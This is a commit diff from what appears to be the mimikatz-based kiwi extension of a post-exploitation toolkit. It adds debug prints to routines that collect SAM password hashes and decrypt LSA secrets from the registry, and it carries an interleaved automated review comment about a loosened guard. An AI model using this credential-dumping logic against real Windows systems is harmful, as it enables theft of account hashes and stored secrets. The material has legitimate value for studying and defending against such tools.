
Added a stack of debug output

This commit is contained in:
OJ 2014-03-28 16:12:29 +10:00
parent 5988a9dbad
commit 0a8e022f41
2 changed files with 26 additions and 2 deletions


@ -539,7 +539,7 @@ VOID sam_hash_handler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwU
dprintf("[KIWI SAM] Made it here");
// only add the result if we have one of the hashes and a user name.
if ((hasLmHash || hasNtlmHash) && lpwUser)
if (lpwUser)
{
dprintf("[KIWI SAM] Adding %S rid %u (%x)", lpwUser, dwRid, dwRid);
@ -561,7 +561,7 @@ VOID sam_hash_handler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwU
}
else
{
dprintf("[KIWI SAM] Ignoring %S, no hashes given");
dprintf("[KIWI SAM] Ignoring %u, no user name", dwRid);
}
}
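Review bot: The relaxed guard `if (lpwUser)` admits an entry for every named account even when neither hasLmHash nor hasNtlmHash is set, so whatever the "Adding" branch appends presumably now carries entries whose hash fields were never filled in; the previous `(hasLmHash || hasNtlmHash) && lpwUser` condition was the only thing excluding them. If loosening the check is deliberate for this debugging pass, mark it at the condition with `// TODO(debug): restore (hasLmHash || hasNtlmHash) guard before release` so it does not ship silently, and the else branch in the second hunk should then still say why a named user was skipped rather than only reporting the no-user-name case. sam_hash_handler begins outside the hunk, so the point where hasLmHash/hasNtlmHash are computed is not visible here.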


@ -594,13 +594,20 @@ BOOL kuhl_m_lsadump_getSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY hPo
}
kull_m_registry_RegCloseKey(hSecurity, hValue);
}
kprintf(L"****************** Trying for the OLD value *******************");
if(kull_m_registry_RegOpenKeyEx(hSecurity, hSecret, L"OldVal", 0, KEY_READ, &hValue))
{
kprintf(L"Reg key opened");
if(kuhl_m_lsadump_decryptSecret(hSecurity, hValue, lsaKeysStream, lsaKeyUnique, &pOld, &dwOldSize))
{
kprintf(L"secret decrypted");
kuhl_m_lsadump_candidateSecret(dwOldSize, pOld, L"\nold/");
kprintf(L"dumped");
}
kprintf(L"closing");
kull_m_registry_RegCloseKey(hSecurity, hValue);
kprintf(L"closed");
}
kull_m_registry_RegCloseKey(hSecurity, hSecret);
}
@ -773,19 +780,26 @@ BOOL kuhl_m_lsadump_decryptSecret(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY
PBYTE secret;
CRYPTO_BUFFER data, output = {0, 0, NULL}, key = {sizeof(NT5_SYSTEM_KEY), sizeof(NT5_SYSTEM_KEY), NULL};
kprintf(L"Decrypting secret");
if(kull_m_registry_RegQueryValueEx(hSecurity, hSecret, NULL, 0, NULL, NULL, &szSecret))
{
kprintf(L"Secret size value queried");
if(secret = (PBYTE) LocalAlloc(LPTR, szSecret))
{
kprintf(L"Memory allocated");
if(kull_m_registry_RegQueryValueEx(hSecurity, hSecret, NULL, 0, NULL, secret, &szSecret))
{
kprintf(L"Secret value queried");
if(lsaKeysStream)
{
kprintf(L"Key stream present");
if(kuhl_m_lsadump_sec_aes256((PNT6_HARD_SECRET) secret, szSecret, lsaKeysStream, NULL))
{
kprintf(L"pulled aes256");
*pSzBufferOut = ((PNT6_HARD_SECRET) secret)->clearSecret.SecretSize;
if(*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut))
{
kprintf(L"copying secret");
status = TRUE;
RtlCopyMemory(*pBufferOut, ((PNT6_HARD_SECRET) secret)->clearSecret.Secret, *pSzBufferOut);
}
@ -793,32 +807,42 @@ BOOL kuhl_m_lsadump_decryptSecret(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY
}
else if(lsaKeyUnique)
{
kprintf(L"unique present");
key.Buffer = lsaKeyUnique->key;
data.Length = data.MaximumLength = ((PNT5_HARD_SECRET) secret)->encryptedStructSize;
data.Buffer = ((PNT5_HARD_SECRET) secret)->encryptedSecret;
kprintf(L"Decrypting DES %p %p %p", &data, &key, &output);
if(RtlDecryptDESblocksECB(&data, &key, &output) == STATUS_BUFFER_TOO_SMALL)
{
kprintf(L"Decrypted");
if(output.Buffer = (PBYTE) LocalAlloc(LPTR, output.Length))
{
kprintf(L"Decrypting ECB block");
output.MaximumLength = output.Length;
if(NT_SUCCESS(RtlDecryptDESblocksECB(&data, &key, &output)))
{
*pSzBufferOut = output.Length;
if(*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut))
{
kprintf(L"Copying value");
status = TRUE;
RtlCopyMemory(*pBufferOut, output.Buffer, *pSzBufferOut);
}
else PRINT_ERROR(L"LocalAlloc failed - pBufferOut");
}
else PRINT_ERROR(L"Decrypt DES block failed");
LocalFree(output.Buffer);
}
else PRINT_ERROR(L"LocalAlloc failed - output.Buffer");
}
else PRINT_ERROR(L"Unexpected result from RtlDecryptDESblocksECB");
}
}
else PRINT_ERROR(L"kull_m_registry_RegQueryValueEx Secret value KO\n");
LocalFree(secret);
}
else PRINT_ERROR(L"LocalAlloc failed - Secret");
}
else PRINT_ERROR(L"pre - kull_m_registry_RegQueryValueEx Secret value KO\n");